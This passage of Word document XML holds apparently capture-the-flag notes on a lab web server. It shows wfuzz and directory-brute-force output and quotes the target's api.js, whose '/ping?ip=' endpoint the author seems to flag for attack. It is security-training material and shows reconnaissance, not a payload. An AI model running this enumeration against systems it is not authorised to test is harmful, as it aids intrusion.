    <w:p w14:paraId="23A2FFED" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/Auth                 (Status: 200) [Size: 39]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40F8D8" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Progress: 220557 / 220558 (100.00%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9756D4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5AEACD1E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="7CCBEA63" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Might as well do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> before we tool around with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35EBC6C9" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Downloaded the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> top 5000 (subdomains-top1million-5000.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3135D95F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="79E0EEDF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -c -f sub-fighter -w subdomains-top1million-5000.txt --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 32  http://10.10.61.189:31331/FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4538C74A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="2E42397A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>(found that negative responses are 32 words long, so that helps get rid of stuff)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA3BDC2" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="4DB39D68" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Target: http://10.10.61.189:31331/FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA8820" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Total requests: 4989</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3542A9" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="694B4427" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>===================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078288A1" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">ID           Response   Lines    Word     Chars       Payload        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C030A7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>===================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291737EF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="7AC98750" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">000000053:   301        9 L      28 W     322 Ch      "images"       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205910CF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>000000406:   301        9 L      28 W     319 Ch      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">"          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E69BB6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>000000454:   301        9 L      28 W     318 Ch      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">"    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F045AD" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="6CADA5EF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5CC3A27B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Within /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D2ECF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="3E39AB24" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Identified some kind of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> running on JS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45676C27" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>http://10.10.61.189:31331/js/api.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BACF979" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="25EB609D" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t>—&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E62FB7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t>(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C160AB" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>console.warn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>('Debugging ::');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A623C9" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B7C18A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>getAPIURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F88BE13" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t>return `${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>window.location.hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>}:8081`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF0AACD" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD57AC0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2F064" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>checkAPIStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D0199" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">const req = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2013192F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B9E84F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> = `http://${getAPIURL()}/ping?ip=${window.location.hostname}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5211D612" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>req.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">('GET', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114E534C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>req.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> = function (e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE4D86" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t>if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>req.readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> === 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F50C905" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>req.status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> === 200) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CBFA0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">console.log('The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> seems to be running')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A902BCC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED26AC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>console.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>req.statusText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF16E1A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C199837" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF1355F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C994A9D" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>req.onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> = function (e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD03F59" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>console.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>xhr.statusText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731B431F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EAFDF6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>req.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1DB065" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4704C711" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t>catch (e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55AFBE" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>console.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43DA52" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t xml:space="preserve">    console.log('API Error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B74DF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F7D3B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5421C5" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>checkAPIStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A0342A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    const interval = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>setInterval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>checkAPIStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>, 10000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FE38E7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    const form = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
